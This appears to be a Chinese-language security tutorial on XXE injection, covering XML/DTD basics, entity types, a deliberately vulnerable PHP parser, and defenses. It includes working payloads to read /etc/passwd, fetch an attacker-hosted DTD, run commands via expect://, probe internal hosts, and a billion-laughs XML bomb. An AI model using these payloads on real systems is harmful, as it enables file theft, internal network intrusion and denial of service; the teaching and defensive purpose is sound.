一、XXE 漏洞是什么：

XXE 漏洞全称：XML External Entity Injection，即 XML 外部实体 注入漏洞。XXE 漏洞发生在应用程序解析 XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件和代码，造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起 Dos攻击等危害。

二、XML基础知识：

想要了解 XXE漏洞，需要先了解一下关于 XML的基础知识。

1、XML是什么？

XML全称：可扩展标记语言（Extensible Markup Language）。

XML是独立于软件和硬件的信息传输工具，它把数据从HTML中分离。 XML语言没有预定义的标签，需要作者定义自己的标签和自己的文档结构。

XML 被设计用来传输和存储数据，HTML 被设计用来显示数据。

2、XML文档结构：

XML文档结构包括：

XML声明
DTD 文档类型定义（可选）
文档元素

示例代码：

其中 DTD (Document Type Definition）即 文档类型定义 部分 定义了XML文档的标签以及元素属性。

如上图中的DTD 就定义了XML的根元素为 note，然后根元素下面有一些子元素 (to,from,heading,body)，那么下面的文档元素就可以使用这些元素：

<note>

<to>Dave</to>

<from>Tom</from>

<head>Reminder</head> <body>You are a good man</body> </note>

注：

PCDATA：可被解析的字符数据。PCDATA 数据类型是会被解析器解析的文本。这些文本将被解析器检查 实体 以及 标记。文本中的标签会被当作标记来处理，而实体会被展开。与之对应的是CDATA

CDATA：不被解析的字符数据，CDATA 数据类型是不会被解析器解析的文本，在这些文本中的标签不会被当作标记来对 待，其中的实体也不会被展开。

DTD声明方式：

其中DTD有两种构建方式，分别为内部 DTD声明和外部 DTD声明。

1、内部DTD声明：

声明格式：

<!DOCTYPE 根元素 [元素声明]>

如 上例使用就是内部 DTD声明。

2、外部DTD声明：

通过引入 dtd文件的方式进行声明（这一点和 css，javascript 很像）。

声明格式：

<!DOCTYPE 根元素 SYSTEM "文件名">

例：

<?xml version="1.0"?> <!DOCTYPE note SYSTEM "test.dtd"> <note>

<to>H</to>

<from>E</from>

<head>L</head> <body>LO</body> </note>

test.dtd：

<!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT head (#PCDATA)> <!ELEMENT body (#PCDATA)>

说完了 DTD的两种引入方式，终于到了关键人物：" 实体 " 登场了。

实体的声明：

实体定义在 DTD声明中，

例：

这里定义元素为 ANY ，表示可以接受任何元素作为标签，这里的 "xxe" 就是我们所说的实体了（相当于一个变量），可以在XML文档元素中使用 & 符号对实体进行引用。

例：

<sss>

<user>&xxe;</user>

<pass>pass</pass>

</sss>

到时候输出的时候 &xxe; 就会被 hello 替换。

实体的分类：

1、按声明位置分（和上面的内外部引入DTD声明不同，别弄混了）：

实体是定义在 DTD 中的，可分为 外部实体 和 内部实体，上面的例子就是内部实体，外部实体就是把实体定义在外部文件中。
实体的分类：

1、按声明位置分（和上面的内外部引入DTD声明不同，别弄混了）：

实体是定义在 DTD 中的，可分为 外部实体 和 内部实体，上面的例子就是内部实体，外部实体就是把实体定义在外部文件中。

例：

<?xml version="1.0"?> <!DOCTYPE sss [ <!ELEMENT sss ANY > <!ENTITY xxe SYSTEM "file:///D:/test.dtd" > //引入外部dtd文件

]>

<sss>

<user>&xxe;</user>

<pass>pass</pass>

</sss>

这样当需要更改实体的值时，只需要更改外部的 dtd 文件就行，不需要打开源码更改了（降低了耦合性），但也带来了安全漏洞。
外部实体支持http、file等协议。不同程序支持的协议不同：

2、按类型分：

实体又分为通用实体和参数实体。

1、通用实体：

用 &实体名;引用，在DTD 中定义（内外DTD都行），在 XML文档元素中引用。

上面的例子都是通用实体。

2、参数实体：

使用 % 实体名(中间有空格) 在DTD中定义（内外DTD都行），并且只能在DTD中使用 %实体名; 引用。

在 DTD 文件中，参数实体的声明可以引用其他实体（参数实体和通用实体）。

<?php libxml_disable_entity_loader (false); $xmlfile = file_get_contents('php://input'); $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_import_dom($dom); echo $creds; ?>

构造payload:

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE c [ - <!ENTITY a SYSTEM "file:///c:/windows/system.ini"> ]>

<c> &a ;</c>

可以看到，成功读取到了 C盘下的 system.ini 文件，此漏洞就是 任意文件读取漏洞。

四、XXE漏洞常见的危害：

1、任意文件读取：

构造任意文件读取漏洞 playload 有下面几种方法：

方式一、直接通过外部实体声明：

XML内容：

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a [ <!ENTITY b SYSTEM "file:///etc/passwd">

]>

&b;

上面的例子就是此方式，这是最简单的XXE漏洞利用。

方式二、外部实体声明 （通用实体）+ 外部 DTD文件：

XML内容：

<?xml version="1.0"?> <!DOCTYPE a SYSTEM "http://XXX/test.dtd">

&b;

注意：这里的 http://XXX/test.dtd 是攻击者自己服务器上的文件。

test.dtd 内容：

<!ENTITY b SYSTEM "file:///etc/passwd">

示例(使用的是 xxe-labs 靶场的php环境)：![image.png]

因为这里使用windows演示的，所以读取的是 system.ini 文件，可以看到成功的读取到了。

方式三、外部实体声明（参数实体） + 引入外部实体声明：

因为参数实体可以嵌套别的实体，所以产生了这种方式。

<?xml version="1.0"?> <!DOCTYPE a[ <!ENTITY % d SYSTEM "http://XXX/test.dtd">

%d;

]>

<c>&b;</c>

test.dtd 内容:

<!ENTITY b SYSTEM "file:///etc/passwd">

示例：

注意这种方式必须要先引用 参数实体，才能引用通用实体，且缺一不可。

2、命令执行：

在安装 expect扩展的PHP环境里执行系统命令，其他协议也有可能可以执行系统命令。

因为PHP的 expect 并不是默认安装扩展，所以命令执行比较难利用，但不排除有幸运的情况。

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "expect://cat /" >]> <root>

<name>&xxe;</name>

</root>

3、内网探测：

XML 外部实体中是可以使用http://协议，可以利用该请求去探查内网。

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "http://127.0.0.1:80" >]> <root>

<name>&xxe;</name>

</root>

4、攻击内网网站：

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "http://127.0.0.1:80/payload" >]> <root>

<name>&xxe;</name>

</root>

5、发起Dos攻击：

几乎所有可以控制服务器资源利用的东西，都可用于制造DOS攻击。通过XML外部实体注入，攻击者可以发送任意的HTTP请求，因为解析器会解析文档中的所有实体，所以如果实体声明层层嵌套的话，在一定数量上可以对服务器器造成DoS。
常见的XML炸弹：

<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">

]>

<lolz>&lol9;</lolz>

攻击原理：XML解析器尝试解析该文件时，DTD中的实体会以指数级的数量级展开，lol 实体为 “lol” 字符串，然后一个 lol2 实体引用了 10 次 lol 实体，一个 lol3 实体引用了 10 次 lol2 实体，此时一个 lol3 实体就含有 102 个 “lol” 了，以此类推，lol9 实体含有 108 个 “lol” 字符串，所以这个1K不到的文件经过解析后会占用到3G的内存,可见有多恐怖，不过现代的服务器软硬件大多已经抵御了此类攻击。

防御XML炸弹的方法也很简单禁止DTD或者是限制每个实体的最大长度。

五、XXE 如何防御：

方式一、使用开发语言提供的禁用外部实体的方法：

PHP：

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();

dbf.setExpandEntityReferences(false);

Python：

from lxml import etree

xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方式二、过滤用户输入：

过滤用户提交的XML数据 ，关键词：<!DOCTYPE>、<!ENTITY>、SYSTEM、PUBLIC。